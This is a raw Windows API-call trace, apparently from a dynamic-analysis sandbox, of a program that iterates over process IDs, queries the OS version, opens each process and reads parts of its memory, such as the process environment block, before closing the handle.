[0403.134] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2448") returned 4
[0403.135] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x3ff, dwBuildNumber=0x0, dwPlatformId=0x128260, szCSDVersion="") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.135] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.159] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x990) returned 0x240
[0403.159] GetLastError () returned 0x0
[0403.159] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.159] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.160] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.160] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x322930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.160] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3226e6, lpBuffer=0x12dd100, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.161] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.163] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.163] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.163] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x321ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.163] malloc (_Size=0x7a) returned 0x2c4740
[0403.163] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x322758, lpBuffer=0x2c4740, nSize=0x78, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.163] free (_Block=0x2c4740)
[0403.164] CloseHandle (hObject=0x240) returned 1
[0403.166] _ui64tow (_Value=0x998, _Buffer="2448", _Radix=10) returned="2456"
[0403.170] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2456") returned 4
[0403.172] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.172] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.198] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x998) returned 0x240
[0403.198] GetLastError () returned 0x0
[0403.198] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.198] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.198] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.198] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4e2960, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.199] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4e26e6, lpBuffer=0x12dd100, nSize=0x82, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.200] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.201] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.201] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.201] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4e1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.201] malloc (_Size=0x8a) returned 0x2c4740
[0403.201] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4e2768, lpBuffer=0x2c4740, nSize=0x88, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.201] free (_Block=0x2c4740)
[0403.202] CloseHandle (hObject=0x240) returned 1
[0403.203] _ui64tow (_Value=0x9a0, _Buffer="2456", _Radix=10) returned="2464"
[0403.207] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2464") returned 4
[0403.209] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.209] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.236] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a0) returned 0x240
[0403.236] GetLastError () returned 0x0
[0403.236] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.236] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.237] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.237] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xb28f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.237] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xb26e0, lpBuffer=0x12dd100, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.239] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.240] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.240] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.240] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xb1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.240] malloc (_Size=0x66) returned 0x2c08e0
[0403.240] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xb273e, lpBuffer=0x2c08e0, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c08e0*, lpNumberOfBytesRead=0x0) returned 1
[0403.241] free (_Block=0x2c08e0)
[0403.242] CloseHandle (hObject=0x240) returned 1
[0403.243] _ui64tow (_Value=0x9a8, _Buffer="2464", _Radix=10) returned="2472"
[0403.251] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2472") returned 4
[0403.252] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.252] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.275] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a8) returned 0x240
[0403.275] GetLastError () returned 0x0
[0403.275] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.275] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.275] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.276] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b2970, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.276] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b26fc, lpBuffer=0x12dd100, nSize=0x80, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.277] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.282] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.282] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.283] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.283] malloc (_Size=0x88) returned 0x2c4740
[0403.283] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b277c, lpBuffer=0x2c4740, nSize=0x86, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.283] free (_Block=0x2c4740)
[0403.284] CloseHandle (hObject=0x240) returned 1
[0403.285] _ui64tow (_Value=0x9b0, _Buffer="2472", _Radix=10) returned="2480"
[0403.289] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2480") returned 4
[0403.291] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.291] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.316] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b0) returned 0x240
[0403.316] GetLastError () returned 0x0
[0403.316] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.316] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.316] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.317] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4a2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.317] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4a26f2, lpBuffer=0x12dd100, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.318] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.320] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.320] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.320] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4a1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.323] malloc (_Size=0x76) returned 0x2c4740
[0403.323] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4a2760, lpBuffer=0x2c4740, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.323] free (_Block=0x2c4740)
[0403.324] CloseHandle (hObject=0x240) returned 1
[0403.325] _ui64tow (_Value=0x9b8, _Buffer="2480", _Radix=10) returned="2488"
[0403.333] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2488") returned 4
[0403.334] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.334] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.361] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b8) returned 0x240
[0403.361] GetLastError () returned 0x0
[0403.361] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.361] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.361] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.361] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4a2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.362] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4a26f0, lpBuffer=0x12dd100, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.363] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.364] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.364] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.364] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4a1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.364] malloc (_Size=0x76) returned 0x2c4740
[0403.364] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4a275e, lpBuffer=0x2c4740, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.365] free (_Block=0x2c4740)
[0403.366] CloseHandle (hObject=0x240) returned 1
[0403.367] _ui64tow (_Value=0x9dc, _Buffer="2488", _Radix=10) returned="2524"
[0403.372] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2524") returned 4
[0403.373] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.373] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.395] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9dc) returned 0x240
[0403.395] GetLastError () returned 0x0
[0403.395] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.395] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.396] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.396] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3b2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.396] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3b26e8, lpBuffer=0x12dd100, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.397] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.398] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.399] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.399] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.399] malloc (_Size=0x76) returned 0x2c4740
[0403.399] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3b2756, lpBuffer=0x2c4740, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.399] free (_Block=0x2c4740)
[0403.400] CloseHandle (hObject=0x240) returned 1
[0403.401] _ui64tow (_Value=0x9e8, _Buffer="2524", _Radix=10) returned="2536"
[0403.406] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2536") returned 4
[0403.407] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.407] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.435] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9e8) returned 0x240
[0403.435] GetLastError () returned 0x0
[0403.435] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.435] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.436] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.436] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x622940, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.436] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x6226f2, lpBuffer=0x12dd100, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.437] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.438] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.438] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.439] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x621ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.439] malloc (_Size=0x78) returned 0x2c4740
[0403.439] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x622762, lpBuffer=0x2c4740, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.439] free (_Block=0x2c4740)
[0403.440] CloseHandle (hObject=0x240) returned 1
[0403.441] _ui64tow (_Value=0x9f4, _Buffer="2536", _Radix=10) returned="2548"
[0403.449] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2548") returned 4
